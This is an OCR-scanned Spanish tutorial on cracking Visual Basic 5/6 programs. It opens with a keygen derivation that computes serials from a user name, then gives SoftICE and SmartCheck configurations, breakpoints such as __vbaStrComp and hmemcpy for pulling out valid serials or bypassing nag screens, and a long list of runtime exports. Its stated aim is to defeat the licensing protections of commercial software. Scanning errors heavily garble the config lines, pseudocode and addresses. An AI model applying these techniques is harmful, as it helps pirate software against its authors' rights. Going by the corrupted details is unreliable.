200000000000000H, cifra = cifra /2, esto os lo digo yo que me lo he curra o:) 


Bien ya tenemos todos los ingredientes para confeccionar el KeyGen. Amos allá! 


Suma=Asc(ler. caracter nombre) + asc(cadauno de los caracteres del nombre), 
tantas veces como letras tenga el nombre. En Basic seria algo así: 


L=Len (nombre$) .......... Longitud del nombre. 


(cod.asc.primer.caracter) btt = Asc(left$(nombref$, 1)) ... en nuestro caso: 85 


Ahora vamos a buscar el número sagrado que se vá multiplicar 36 veces. Sería algo 
asi: 


Forx=1ToL 


ef = Asc(MidS(nombre$, x, 1)):....en e se lamacena el ASCII de cada caracter del 
nombre 


suma+t = sumatt + ef + bH 


Next 
Ok!, en suma tenemos yá almacenado el numero dorado, 4355 


La segunda parte es: 


Forx=1 To 36 
suma+ = suma+ + suma+t 
Next 


sumatt = 74818330296320, pero no nos vale. 
la tercera parte del keygen es: 


While suma? >= 200000000000000+ 
suma+t = suma+t / 2 
Wend 


Ahora suma+f contiene el serial correcto para ese nombre: 149636660592640 


y ya hemos confeccionado el KeyGen. No es ná, gracias y tá otra! 
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CRACKEANDO EN 
VISUAL BASIC 


Tutorial por: Esiel2. 
1) Introduccion. 
2) Primeros Pasos: Configuracion de Nuestras Herramientas. 
3) Descompiladores para Visual Basic. 
4) Crackeando Usando el Soft-Ice. 
5) Crackeando Usando el Smartcheck. 
6) La Alternativa: La Funcion Hmemcpy. 


7) Lista de Posibles Breakpoints en Visual Basic 5 y ¿6? 


1) Introduccion. 


Antes de empezar quisiera decir que hago este tutorial para que quien lo 
lea sepa lo basico a mi entender que debe tener de herramientas y unos 
conocimientos de algunas funciones que tanto le gusta llamar el visual 
basic, a su dll de alma (nunca mejor dicho) MSVBVM50.DLL o la 
ultima version MSVBVM60.DLL para poder hacer algo interesante sin 
que nada nos estorbe. Cada vez nos encontramos con mas programas 
hechos en visual basic, espero que este tutorial te sirva para abordarlos. 


Las herramientas necesarias o imprescindibles, mas bien esto 
ultimo son el poco ;) conocido Soft-ice y el Smartcheck, cuanto mas 
actualizado pues mejor ;). Espero que te sirva de base para crackear 
estos programas, y si te fijas, no cambia mucho la forma de afrontar las 
protecciones con respecto a otros programas compilados en otros 
lenguajes. 


2) Primeros Pasos: Configuracion de Nuestras Herramientas. 


Lo primero de todo claro esta es despues de tener las herramientas, configurarlas como 
'dios' manda para que haga lo que nosotros necesitamos ya que si no de poco nos sirve bajarnos 
tantos megas. 


Para configurar el soft-ice, no hay problema porque si ya hemos crackeado antes 
tendremos bien configurado el programa, no obstante aqui pongo mi winice.dat (cada uno lo 
puede adoptar a sus gustos, seguro que hay mejores formas, pero a mi me va bien asi) por si hay 
dudas al respecto: 


// Aquií empieza // 


NMI=ON 
SIWVIDRANGE=0N 
LOWERCASE=0N 
MOUSE=0N 
NOLEDS=0FF 
NOPAGE=0FF 
PENTIUM=0N 
THREADP=0N 
VERBOSE=0N 


PHYSMB=128 
SYM=312 
HST=512 
DRAWSIZE=2048 
TRA=8 


INIT="WL;WR;WD;X;" 


Fl="h;" 
F2="»wr;" 
F3="src;" 
F4=""1s;" 


F5="Ax; " 


F6=""ec;" 

F7=""here;" 

ES=""" 

F9=""bpx;" 

F10="2p;" 

F11=""G ESS:ESP;" 
F12=""p ret;" 
SF3=""format;" 
CF8=""XT;" 
CF9="TRACE OFF;" 
CF10=""XP;" 
CF11="SHOW B;" 
CF12="TRACE B;" 
AF1=""wr;" 

AF2=""wd;" 

AF3=""wc;" 
AF4="»ww;" 
AF5="CLS);" 
AF8="A»XTR;" 
AF11=""dd dataaddr->0;" 
AF12=""dd dataaddr->4;" 
CF1="altscr off; lines 60; wc 32; wd 8;" 
CF2=""wr;"wd;wc;" 


EXP=c.Wwindowsisystemikernel32.dll 
EXP=c.Wwindowsisystemiuser32.dll 
EXP=c.Wwindowsisystemigdi32.d1l 
EXP=c.Wwindowsisystemibivbx10.dll 
EXP=c.Wwindowsisystemicomdlg32.dll 
EXP=c.Wwindowssystemishell32.d1l 
EXP=c.Wwindowsisystemiadvapi32.dll 
EXP=c:.1Wwindowslsystemishell232.d1l 
EXP=CAwindowslsystemibivbx10.dll 
EXP=c.Wwindowsisystemicomcetl32.d1l 


WDMEXPORTS=0FF 
MONITOR=0 
PHYSMB=16 
SYM=312 

HST=256 

TRA=8 

MACROS=32 
DRAWSIZE=2048 


; WINICE.DAT 


; (SIWOSWINICE.DAT) 
; for use with SoftICE Version 3.2 (Windows 95) 
; 14 July 1997 


O O O O OO OOO ORO RON 
> 


; If your have MORE than 32MB of physical memory installed, change 
; the PHYSMB line to the correct ++ of Megabytes. 

; If you have LESS than 32MB you can save a bit of memory by 

; Specifying the correct + of Megabytes 

; Example: PHYSMB=32 

AE AAA AE ARAS ERA AREA AAN REA 
y ee Examples of sym files that can be included if you have the SDK +++ 
; Change the path to the appropriate drive and directory 
¡LOAD=cAwindowsisystemluser.exe 
¡LOAD=cAwindowsisystemligdi.exe 
¡LOAD=cAwindowsisystemikrn1386.exe 
¡LOAD=cAwindowsisystemimmsystem.dll 
¡LOAD=cAwindowsisystemiwin386.exe 

y ee Examples of export symbols that can be included *+**+** 

; Change the path to the appropriate drive and directory 
¡EXP=cwindowsisystemWvga.drv 

¡EXP=cAwindowsisystemWga.3gr 
¡EXP=cwindowsisystemisound.drv 
¡EXP=cAwindowsisystemimouse.drv 
¡EXP=cwindowsisysteminetware.drv 
¡EXP=cwindowsisystemisystem.drv 
¡EXP=cwindowsisystemlkeyboard.drv 
¡EXP=cwindowsisystemitoolhelp.dll 
¡EXP=cwindowsisystemishell.dll 
¡EXP=cwindowsisystemicommdlg.d!l 
¡EXP=cwindowsisystemlolesvr.dll 
¡EXP=cwindowsisystemlolecli.dll 
¡EXP=cwindowsisystemimmsystem.dll 
¡EXP=cwindowsisystemiwinoldap.mod 
¡EXP=cwindowsiprogman.exe 

¡EXP=cwindowsidrwatson.exe 

y ee Examples of export symbols that can be included for Windows 93 “tes 
; Change the path to the appropriate drive and directory 
¡EXP=cwindowsisystemicertdll.dll 
¡EXP=cwindowsisystemWersion.dll 
¡EXP=cwindowsisysteminetlib32.dll 


¡EXP=cAwindowsisystemimsshrui.dll 
¡EXP=cwindowsisystemimsnet32.dll 
¡EXP=cwindowsisystemimspw132.dll 
¡EXP=cwindowsisystemimpr.dll 
:exp=cwindowsisystemimsvbvm50.dll 
exp=c1windowsisystemimsvbvm60.dll 


// Aqui termina // 


Estas dos ultimas lineas del fichero winice.dat son importantisimas, si el programa que 
vas a crackear esta hecho en visual basic 5 (msvbvm50.dll) tienes que quitarle el ';' para que el 
soft-ice detecte cuando llama a dicha libreria porque si no ignoraria los breakpoints aunque este 
activa la del visual basic 6 (msvbvm60.dll), por lo demas funciona igual que con cualquier 


programa a crackear. 


Para configurar el smartcheck, tienes que ir menu program y en settings poner lo siguiente: 


21x] 


Error Detection | Reporting | Files to Check | Error Suppression | Program Info | 


SmartEheck can detect and report mary bypes of problema. Elick on a type to 
see additional settings. Clear a type if you dor't ant to check for thoze kindz 


of problernz. 


Type of errors ta check for Additional settings 


E: Memory errors e Erecktorunitaleed memornerrare 
12] Pointer errors 
Leaks 


[2] API and OLE function call error: 


Report errors immediately 


Adwanced... | 
T” Save theze settings as the initial values for new programes Default Settinos | 


Cancel | Help | 


Msc ape ea alejan 


E rente MENOR patera apodaca 0er 


21x] 


Error Detection Reporting | Filez to Check | Error Supprezsion Program Info | 


SmartEheck vall normally begin reporting events and errors immediately after starting the 
program. li pou mould hke to control when event reporting starte, clear the setting below. 


A A E E A 


O A ee 


— Report additional event: 
Information about the eventz below 1: z=ometimez valuable in diagnosing problems, but 
can significantly increaze the disk space used by SmariCheck as ibreporte evente. 
Select the evente pou would like SmartCheck to Include in its reporte. 
[Y Report handled Wisual Basic runtime errors 
[e Perform analysis of handled Visual Basic runtime errors 
Report Mouselmowe events from DC controls 
[- ReportWéindows messages 
[Y Report callback and hook function: 


Cancel | Help | 


Despues de tener configurarado las herramientas, es hora de entrar en materia con mas 
salsa. 


3) Descompiladores para Visual Basic 


Descompiladores de visual basic, que yo sepa existe para la 
version 3.0 de este lenguaje en la pagina de DODI (facil de buscar en 
cualquier buscador de internet como en altavista o yahoo), y me parece 
que existe otra version para el visual basic 4.0 pero yo no he probrado 
ninguna de las dos, asi que no puedo decir nada mas. En cuanto a las 
versiones 5.0 y 6.0, por lo menos hasta el momento de escribir este 
tutorial creo que no existe (no verlo, no quiere decir que no exista), asi 
que mala suerte no podemos usar ningun descompilador para los 
programas mas nuevos e interesantes. 


4) Crackeando Usando el Soft-Ice. 


Para empezar, tengo que decir esta herramienta sirve de igual 
modo para los programas realizados en visual basic que en los demas, 
solo hay que tener en cuenta unas cuantas cositas basicas como saber 
que cuando el programa a crackear te pide un password o un serial, este 
es guardado en una variable en formato ancho, es decir, si la clave fuese 
'esiel2' se almacenaria como 'e sie 12' con lo cual si hacemos una 
busqueda en memoria no encontrariamos ninguna direccion donde 
estaria almacenada y nos quedariamos algo extrañados(pero existe un 
breakpoint para esto muy interesante como son: 
MultiWideToWideChar y WideCharToMultiWide), con lo cual quiero 
decir que esto es un dato muy a tener en cuenta. 

Aclarado esto, ¿como podemos abordar un programa en Visual 
Basic utilizando Soft-Ice? ... Pues lo primero a mi modo de ver es lo 
siguiente, yo establecería una regla de semejanza, suponiendo que 
hayas hecho antes un crack, entonces los breakpoints de la derecha te 
deben ser familiares. 


VB breakpoints Breakpoints "normales" 
rtemsgbox messagebox/a/exa 
rtcinputbox getwindowtext/a, 

getdlgitemtext/a 
_ vbanew,  vbanew2 - dialogbox, 
dialogboxparam/a 
— vbastrcomp - Istremp 


Con estos breakpoints, ya te puedes hacer una idea de lo que se 
puede hacer, eso si, la cosa no es tan directa como en cualquier 


programa hecho en un leguaje de programacion decente asi que para 
llegar al meollo de lo que busques tendras que pasar de mucho codigo 
inservible pero todo llega, asi que solo es cosa de tener PACIENCIA. Y 
todo se reduce a trazar el programa como si no fuese realizado en 
Visual Basic. 


Luego, por ejemplo con rtemsgbox al usarlo tendrias que 
remontar codigo hacia atras para encontrar donde el programa ha 
tomado la decision de no registrarte para converncerle de lo contrario 
(es a lo que yo le llamo cracking retro, puesto que tienes ir siempre 
hacia atras en el codigo) esto es una tarea facil pero pesada ya que hay 
muchas llamadas inutiles. En cuanto al rtcinputbox, pues lo tipico, al 
introducir la clave o serial y pulsar sobre el boton aceptar pues 
volvemos al codigo y hariamos lo tipico que se suele hacer con las 
funciones getwindowtext/a y getdlgitemtext/a. El tercer breakpoint 
importante para mi es el__vbanew y __vbanew2 ya que mediante el 
podemos parar la ejecucion del programa antes de que nos saque un 
formulario, este breakpoint es muy util para los programas que tienen 
basada su proteccion en nagscreens. En cuanto a __ vbastrcomp, pues 
casi su propio nombre indica para que sirve asi que paso decir nada 
mas. ;) .... MUY UTIL. 


Como caso excepcional, esta el breakpoint rtcdoevents, ya que 
este breakpoint es muy usado por el compilador del visual basic, con lo 
cual puede parecer que no nos es de gran ayuda puesto que 
constantemente lo esta llamando pero sin embargo si lo es por la 
siguiente razon: cuando un programa realizado en visual basic tiene que 
realizar calculos que consume muchos recursos del sistema pues para 
no colgar el windows 9x pues el programador se ve obligado a insertar 
en el codigo la funcion doevents, con lo que se puede entrar en bucles 
donde solo se hagan calculos como por ejemplo en el cuentapasos el 
autor hace muchos calculos pero nosotros solo vemos la nagscreen pero 
mediande este breakpoint pues le jodemos el invento, asi que como 
conclusion, esta funcion es util cuando estamos seguros de que el 
programa hace muchos calculos y nosotros queremos meternos dentro 
para husmear un pokito. XD. 


Un ejemplillo de como crackear de esta manera lo podeis ver 
hechandole un vistazo al tutorial del Cuentapasos 3.72 y del Exploit 
Submission Wizard 5. 


5) Crackeando Usando el Smartcheck, 


Bien, el smartcheck es otra gran herramienta de los geniales 
programadores de Numega, pues con esta herramienta podemos ver las 
tripas de los programas realizados en Visual Basic, desde un simple 
vistazo y encontrar un serial valido, hasta ir analizando que va haciendo 
el programa paso a paso, como asiganaciones de variables sospechosas, 
conversiones de tipos de datos, acceso a apis, etc, etc. Luego, 
sabiendolo usar simplifica mucho el cracking para estos programas, 
pero como todo en la vida, lo mas importante es la experiencia, cuanto 
mas utilices este programa antes te daras cuenta de que es lo que 
verdaderamente te interesa ver y que es lo que te trae sin cuidado. 


Para hacer un cracking en 2 minutos lo mas comun es que nos 
pidan el tipico nombre y serial, e inmediatamente despues pues nos 
saque un bonito mensaje mediante msgbox del visual basic, pues 
mirando alrededor de este msgbox dentro del smartcheck pues nos 
encontraremos con un serial valido para nuestro nombre, asi de facil !!!. 
Tambien podemos hacer un generador de claves de forma relativamente 
sencilla puesto que si estamos viendo constantemente las asignaciones, 
conversiones de variables, comparacines, ... con los valores que van 
tomando en la ventana de la parte derecha del monitor asi pues solo 
tenemos que analizar con detenimiento y paciencia el listado que nos 
saca el smartchek y generar nuestro generador de claves. 


Un ejemplo sencillito de como crackear programas de esta forma 
es el tutorial del programa: Java script It! v1.3. 


6) La Alternativa: La Funcion Hmemcpy. 


Bien, esta funcion no suele comentarse mucho en los tuturiales 
pero es otra gran baza para nuestro menester puesto que como bien 
comenta Wkt_White en su tutorial generico sobre el uso de esta funcion 
podemos cazar los password o serial de una manera un poco sutil y facil 
(todo depende de los programadores, aunque si utilizan este lenguaje, 
no creo que se calienten la cabeza por impedir que esta funcion no nos 
sirva XD), en la mayoria de programas realizado en este lenguaje, 
aunque tengo que decir que siempre hay excepciones. 


Para ello, los pasos basicos a seguir (casi mecanicamente) son los 
siguientes: Primero despues de saber que es un programa VB, 
introducimos nuestro serial, ponemos el breakpoint bpx hmemcpy 
pulsamos Ctrl-D e inmediatamente pues volvemos al soft-ice y tenemos 
que FIJARNOS bien que en la linea que hay debajo del desensamblado 
aparezca nombredelprogramaacrackear!.text y a partir de aqui mirar 
detenidamente los push siguientes ya que se suelen almacenar el que tu 
has introducido y el correcto; si miras estos push, lo mas normal es que 
te encuentres con tu serial introducido 'e sie 12' y por ejemplo el 
correcto que podria ser 'EXPEDIENTE - X', ahora solo queda 
borrar los breakpoints y probar con este serial que has obtenido y en el 
75 % o mas de las veces es el serial correcto. 


NOTA: si te fijas las cadenas estan en formato ancho. El serial seria: 
'EXPEDIENTE - X'. 


7) Lista de Posibles Breakpoints en Visual Basic 5 y ¿6? 


Esta lista la obtuve de un tutorial en ingles, y no recuerdo 
exactamente el autor ya que la cogi, la corte del documento y lo puse en 
otro fichero para cuando me hiciese falta consultarlas, asi que ;(. 


Lista: 


Addr:OFOOA1BF Ord: 100 (0064h) Name: ThunRTMain 
Addr:0F03A65D Ord: 101 (0065h) Name: VBDIlUnRegisterServer 
Addr:0F05A843 Ord: 102 (0066h) Name: VBDIlICanUnloadNow 
Addr:0F0BF123 Ord: 103 (0067h) Name: VBDlIRegisterServer 
Addr:0F03137D Ord: 104 (0068h) Name: VBDIIGetClassObject 
Addr:0F04027D Ord: 105 (0069h) Name: UserDllMain 
Addr:0FOCDB46 Ord: 106 (006Ah) Name: DllRegisterServer 
Addr:0F0CDD17 Ord: 107 (006Bh) Name: DllUnregisterServer 
Addr:O0FOSC5AE Ord: 108 (006Ch) Name: __vbaAryLock 
Addr:0FOD9OFS Ord: 109 (006Dh) Name: __vbaBoolErrVar 
Addr:0FOD90EC Ord: 110 (006Eh) Name: __vbaStrErrVarCopy 
Addr:0F109E57 Ord: 111 (006Fh) Name: __ vbaAryVarVarg 
Addr:0F10A259 Ord: 112 (0070h) Name: __vbaFpCDbIR4 
Addr:0F10A259 Ord: 113 (0071h) Name: __vbaFpCDbIRS 
Addr:0F10A242 Ord: 114 (0072h) Name: _ vbaFpCSngR4 
Addr:0F10A242 Ord: 115 (0073h) Name: __vbaFpCSngR8 
Addr:0F10A270 Ord: 116 (0074h) Name: __vbaFpCmpCy 
Addr:0F10A1F7 Ord: 117 (0075h) Name: __vbaFpCy 
Addr:0F1021C9 Ord: 118 (0076h) Name: __vbaFpI2 
Addr:0F102FE8 Ord: 119 (0077h) Name: __vbaFpI4 
Addr:0F10A1E3 Ord: 120 (0078h) Name: __vbaFpR4 
Addr:0F101FA3 Ord: 121 (0079h) Name: __vbaFpR8 
Addr:0F10A1C5 Ord: 122 (007Ah) Name: __vbaFpUll 
Addr:0F01DC7F Ord: 123 (007Bh) Name: __vbaFreeObj 
Addr:0F01F878 Ord: 124 (007Ch) Name: __vbaFreeStr 
Addr:0FOFDOD2 Ord: 125 (007Dh) Name: __vbaFreeVar 
Addr:0F109B75 Ord: 126 (007Eh) Name: __vbaFreeVarg 
Addr:0FODDFOC Ord: 127 (007Fh) Name: __vbal2Abs 
Addr:0FO1BFDD Ord: 128 (0080h) Name: __vbal214 
Addr:0FODDES5S5 Ord: 129 (0081h) Name: __vbal2Sgn 
Addr:0FODDF29 Ord: 130 (0082h) Name: __vbal4Abs 
Addr:0FODDF6A Ord: 131 (0083h) Name: __vbal4Sgn 
Addr:0F01F8A3 Ord: 132 (0084h) Name: __vbaStrCopy 
Addr:OFOIFSDA Ord: 133 (0085h) Name: __vbaStrMove 
Addr:0F0407A5 Ord: 134 (0086h) Name: __vbaUlI1I2 
Addr:0F0407D3 Ord: 135 (0087h) Name: __vbaUI1I4 
Addr:0FODDF41 Ord: 136 (0088h) Name: __vbaUl1Sgn 


Addr:0F100CFE Ord: 137 (0089h) Name: __vbaVarCopy 
Addr:0F100C68 Ord: 138 (008Ah) Name: __vbaVarDup 
Addr:0F100E23 Ord: 139 (008Bh) Name: _ vbaVarMove 
Addr:0F101E51 Ord: 140 (008Ch) Name: _ vbaVarVargNofree 
Addr:0F109C1B Ord: 141 (008Dh) Name: __vbaVargParmRef 
Addr:0F109C29 Ord: 142 (008Eh) Name: __vbaVargVar 
Addr:0F109CB3 Ord: 143 (008Fh) Name: _ vbaVargVarCopy 
Addr:0F109CA3 Ord: 144 (0090h) Name: __ vbaVargVarMove 
Addr:0F109C7C Ord: 145 (0091h) Name: __vbaVargVarRef 
Addr:0FOCDE3C Ord: 146 (0092h) Name: DLLGetDocumentation 
Addr:0F0342AB Ord: 147 (0093h) Name: _Clatan 
Addr:0F0399BC Ord: 148 (0094h) Name: _Clcos 
Addr:0F01F2DD Ord: 149 (0095h) Name: _Clexp 
Addr:0F0342BS Ord: 150 (0096h) Name: _Cllog 
Addr:0F0399B2 Ord: 151 (0097h) Name: _Clsin 
Addr:0F0342BF Ord: 152 (0098h) Name: _Clsqrt 
Addr:OFOEA75B Ord: 153 (0099h) Name: _Cltan 
Addr:0F0SDO04F Ord: 154 (009Ah) Name: __vbaAptOffset 
Addr:0F058E7D Ord: 155 (009Bh) Name: __vbaAryConstruct 
Addr:0FOD002D Ord: 156 (009Ch) Name: __vbaAryCopy 
Addr:OFO1ESBA Ord: 157 (009Dh) Name: _ vbaAryDestruct 
Addr:0FODO066 Ord: 158 (009Eh) Name: __vbaAryMove 
Addr:0FO0D3880 Ord: 159 (009Fh) Name: __vbaAryRebasel Var 
Addr:0FOSC5CE Ord: 160 (O00A0h) Name: __vbaAryUnlock 
Addr:0F0401F9 Ord: 161 (00A1h) Name: _ vbaBoolStr 
Addr:0F01B3FD Ord: 162 (00A2h) Name: __vbaBoolVar 
Addr:0F100A35 Ord: 163 (00A3h) Name: _ vbaBoolVarNull 
Addr:0F1003B6 Ord: 164 (00A4h) Name: __vbaCastObj 
Addr:0F05CF87 Ord: 165 (0O0AS5h) Name: __vbaCastObjVar 
Addr:0F03050C Ord: 166 (00A6h) Name: __vbaCheckType 
Addr:OFOSFA8A Ord: 167 (00A7h) Name: _ vbaCheckTypeVar 
Addr:0FO1F90B Ord: 168 (O00OA8h) Name: __vbaChkstk 
Addr:0FO0D2D1F Ord: 169 (00A9h) Name: _ vbaCopyBytes 
Addr:0F0E1208 Ord: 170 (OOAAh) Name: __vbaCyAbs 
Addr:OFOEOF7E Ord: 171 (O0OABh) Name: __vbaCyAdd 
Addr:0FODEO0OOC Ord: 172 (00ACh) Name: __vbaCyErrVar 
Addr:0F0E1047 Ord: 173 (OOADh) Name: __vbaCyFix 
Addr:0F10B3BE Ord: 174 (0OOAEh) Name: __vbaCyForlnit 
Addr:0F10B3E7 Ord: 175 (0OAFh) Name: __vbaCyForNext 
Addr:0FOD904C Ord: 176 (00BOh) Name: __vbaCyl2 
Addr:0FOD9OSB Ord: 177 (00B 1h) Name: __vbaCyl4 
Addr:0FOE10C8 Ord: 178 (00B2h) Name: __vbaCylInt 
Addr:O0FOEOFCS5 Ord: 179 (00B3h) Name: __vbaCyMul 
Addr:OFOEOFF6 Ord: 180 (00B4h) Name: __vbaCyMull2 
Addr:0OFODDFDD Ord: 181 (00B5h) Name: __vbaCySgn 


Addr:0F0D8DO08 Ord: 182 (00B6h) Name: __vbaCyStr 
Addr:0FOEOF93 Ord: 183 (00B7h) Name: __vbaCySub 
Addr:0F0D903D Ord: 184 (00B8h) Name: __vbaCyUIl 
Addr:0FODE016 Ord: 185 (00B9h) Name: __vbaCyVar 
Addr:0F100284 Ord: 186 (OOBAh) Name: ProcCallEngine 
Addr:0F04F3E0 Ord: 187 (OOBBh) Name: DlIFunctionCall 
Addr:0FOSDF2C Ord: 188 (0OBCh) Name: __vbaRecAssign 
Addr:0F02591E Ord: 189 (0OBDh) Name: __vbaRecDestruct 
Addr:0F0D35396 Ord: 190 (0OBEh) Name: CopyRecord 
Addr:0FOD908B Ord: 191 (OOBFh) Name: __ vbaDateR4 
Addr:0FOD9OCO Ord: 192 (0OOCOh) Name: __vbaDateR8 
Addr:0F0543C3 Ord: 193 (00C1h) Name: __vbaDateStr 
Addr:0F06165A Ord: 194 (00C2h) Name: __vbaDateVar 
Addr:0F05B550 Ord: 195 (00C3h) Name: 
TipGetAddressOfPredeclaredInstance 
Addr:0FOD38FES5 Ord: 196 (00C4h) Name: __vbaDerefAry 
Addr:0FOSBCCD Ord: 197 (0OC5h) Name: __vbaDerefAryl 
Addr:0F03873E Ord: 198 (00C6h) Name: _ vbaEnd 
Addr:0F102FFC Ord: 199 (00C7h) Name: MethCallEngine 
Addr:0F01E309 Ord: 200 (00C8h) Name: __ vbaErase 
Addr:0FO0D38A2 Ord: 201 (00C9h) Name: __vbaEraseKeepData 
Addr:0F0D38D1 Ord: 202 (0OCAh) Name: __vbaEraseNoPop 
Addr:0FODOC66 Ord: 203 (0OCBh) Name: __vbaError 
Addr:0FODOC7F Ord: 204 (0OCCh) Name: __vbaErrorOverflow 
Addr:0F022B59 Ord: 205 (0OCDh) Name: __vbaExceptHandler 
Addr:0F10A15B Ord: 206 (0OCEh) Name: __vbaExitEachAry 
Addr:0F10A180 Ord: 207 (O0OCFh) Name: __ vbaExitEachColl 
Addr:0F10A13B Ord: 208 (00DOh) Name: __vbaExitEachVar 
Addr:0F02B41E Ord: 209 (00D1h) Name: __vbaExitProc 
Addr:0F10A1A4 Ord: 210 (00D2h) Name: __vbaFPException 
Addr:0F0E1093 Ord: 211 (00D3h) Name: __vbaFPFix 
Addr:0F0E111D Ord: 212 (00D4h) Name: __vbaFPInt 
Addr:OFOCFCDS Ord: 213 (00D5h) Name: __vbaFailedFriend 
Addr:0F01F890 Ord: 214 (00D6h) Name: __vbaFileClose 
Addr:0F03632E Ord: 215 (00D7h) Name: __vbaFileCloseAll 
Addr:0OFODEAB7 Ord: 216 (00D8h) Name: __vbaFileLock 
Addr:0F0028A1 Ord: 217 (00D9h) Name: __vbaFileOpen 
Addr:0FODEOD8 Ord: 218 (OODAh) Name: __vbaFileSeek 
Addr:0F03A53E Ord: 219 (0ODBh) Name: __vbaFixstrConstruct 
Addr:OFOCFCSA Ord: 220 (00DCh) Name: TipSetOption 
Addr:0F109FC1 Ord: 221 (00DDh) Name: __vbaForEachAry 
Addr:0F102BAC Ord: 222 (0ODEh) Name: __vbaForEachCollAd 
Addr:0F102B4E Ord: 223 (V0ODFh) Name: __vbaForEachCollObj 
Addr:0F102BFF Ord: 224 (00EO0h) Name: __vbaForEachCollVar 
Addr:0F10A046 Ord: 225 (00E1h) Name: __vbaForEachVar 


Addr:0F024FE8 Ord: 226 (00E2h) Name: __vbaFreeObjList 
Addr:0F0162DA Ord: 227 (00E3h) Name: TipUnloadProject 
Addr:0FO1F9AS8 Ord: 228 (00E4h) Name: __vbaFreeStrList 
Addr:0F10182B Ord: 229 (00ES5h) Name: __vbaFreeVarList 
Addr:0FODOCAB Ord: 230 (00E6h) Name: TipCreatelInstanceProject 
Addr:0F0158B9 Ord: 231 (00E7h) Name: EbResetProject 
Addr:0F02627A Ord: 232 (00E8h) Name: 
EbGetHandleOfExecutingProject 

Addr:0F0D39B3 Ord: 233 (00E9h) Name: _ vbaGenerateBoundsError 
Addr:0FODE306 Ord: 234 (OOEAh) Name: __vbaGet3 
Addr:0F0DE322 Ord: 235 (00EBh) Name: __vbaGet4 
Addr:0F03A579 Ord: 236 (00ECh) Name: __vbaGetFxStr3 
Addr:0FODE3B4 Ord: 237 (0OEDh) Name: __vbaGetExStr4 
Addr:0F040650 Ord: 238 (O0EEh) Name: __ vbaGetOwner3 
Addr:0FODE35D Ord: 239 (OOEFh) Name: __vbaGetOwner4 
Addr:0F109A05 Ord: 240 (OOFOh) Name: __vbaGosub 
Addr:0F109A59 Ord: 241 (00F1h) Name: _ vbaGosubFree 
Addr:0F109A2E Ord: 242 (00F2h) Name: __vbaGosubReturn 
Addr:0F0D2D92 Ord: 243 (00F3h) Name: __vbaHresultCheck 
Addr:0FOD2DAO Ord: 244 (00F4h) Name: __vbaHresultCheckNonvirt 
Addr:0F02B4EB Ord: 245 (00FSh) Name: __vbaHresultCheckObj 
Addr:0F10A21E Ord: 246 (00F6h) Name: __vbal2Cy 
Addr:0F0534BD Ord: 247 (00F7h) Name: __vbal2ErrVar 
Addr:0F10B47D Ord: 248 (00F8h) Name: _ vbal2ForNextCheck 
Addr:0F0508A7 Ord: 249 (00F9h) Name: __vbal2Str 
Addr:0FO1B9DA Ord: 250 (OOFAh) Name: __vbaL2Var 
Addr:0F10A230 Ord: 251 (O0FBh) Name: __vbal4Cy 
Addr:OFOSOAFO Ord: 252 (OOFCh) Name: __vbal4ErrVar 
Addr:0F10B4A09 Ord: 253 (OOFDh) Name: __vbal4ForNextCheck 
Addr:0FO0O4A6AS5 Ord: 254 (OOFEh) Name: __vbal4Str 
Addr:0F01BDB4 Ord: 255 (OOFFh) Name: __vbal4Var 
Addr:0F00BD94 Ord: 256 (0100h) Name: __vbalnStr 
Addr:0FODF190 Ord: 257 (0101h) Name: __vbalnStrB 
Addr:0FODF060 Ord: 258 (0102h) Name: __vbalnStrVar 
Addr:0FODEF30 Ord: 259 (0103h) Name: __vbalnStrVarB 
Addr:0F0DDDA41 Ord: 260 (0104h) Name: __vbalnputFile 
Addr:0F10302F Ord: 261 (0105h) Name: _ vbaLateldCall 
Addr:0F10304B Ord: 262 (0106h) Name: __vbaLateldCallLd 
Addr:0F10B15C Ord: 263 (0107h) Name: __vbaLateldCallSt 
Addr:0F10B1F2 Ord: 264 (0108h) Name: __vbaLateldNamedCall 
Addr:0F05B2A9 Ord: 265 (0109h) Name: EbResetProjectNormal 
Addr:0F03BE99 Ord: 266 (010Ah) Name: TipUnloadInstance 
Addr:0F10B1AS8 Ord: 267 (010Bh) Name: _ vbaLateldNamedCallLd 
Addr:0F009EE7 Ord: 268 (010Ch) Name: EbLibraryLoad 
Addr:0FODO9C6 Ord: 269 (010Dh) Name: EbLibraryUnload 


Addr:0F10B1D1 Ord: 270 (O10Eh) Name: __ vbaLateldNamedCallSt 
Addr:0F0112D1 Ord: 271 (010Fh) Name: EbLoadRunTime 
Addr:0F10B217 Ord: 272 (0110h) Name: __vbaLateldNamedStAd 
Addr:0F1032CD Ord: 273 (0111h) Name: __vbaLateldSt 
Addr:OFOOEEDS Ord: 274 (0112h) Name: EbCreateContext 
Addr:0F017F68 Ord: 275 (0113h) Name: EbDestroyContext 
Addr:OFOOEFIC Ord: 276 (0114h) Name: EbSetContextWorkerThread 
Addr:0F10B18E Ord: 277 (0115h) Name: __ vbaLateldStAd 
Addr:0F10300A Ord: 278 (0116h) Name: _ vbaLateMemCall 
Addr:0F1024A4 Ord: 279 (0117h) Name: _ vbaLateMemCallLd 
Addr:0F10B23A Ord: 280 (0118h) Name: __vbaLateMemCallSt 
Addr:0F10B2C8 Ord: 281 (0119h) Name: _ vbaLateMemNamedCall 
Addr:0F10B27E Ord: 282 (011Ah) Name: 

_ vbaLateMemNamedCallLd 

Addr:0F10B2A7 Ord: 283 (011Bh) Name: 

_ vbaLateMemNamedCallSt 

Addr:0F10B2ED Ord: 284 (011Ch) Name: 

_ _vbaLateMemNamedStAd 

Addr:0F10322E Ord: 285 (011Dh) Name: __vbaLateMemSt 
Addr:0F10B25B Ord: 286 (011Eh) Name: __vbaLateMemStAd 
Addr:0F01BE08 Ord: 287 (011Fh) Name: __vbaLbound 
Addr:0F00BD80 Ord: 288 (0120h) Name: __vbaLenBstr 
Addr:0FODED54 Ord: 289 (0121h) Name: __vbaLenBstrB 
Addr:0FODEBFO Ord: 290 (0122h) Name: __vbaLenVar 
Addr:OFODEC7F Ord: 291 (0123h) Name: _ vbaLenVarB 
Addr:0FODCE29 Ord: 292 (0124h) Name: __vbaLinelInputStr 
Addr:0OFODCF1A Ord: 293 (0125h) Name: __vbaLinelnputVar 
Addr:0F03A5C8 Ord: 294 (0126h) Name: __vbaLsetFixstr 
Addr:0FOEOF36 Ord: 295 (0127h) Name: __vbaLsetFixstrFree 
Addr:0FODF669 Ord: 296 (0128h) Name: _ vbaMidStmtBstr 
Addr:0FODF754 Ord: 297 (0129h) Name: _ vbaMidStmtBstrB 
Addr:0F01612B Ord: 298 (012Ah) Name: EbIsProjectOnStack 
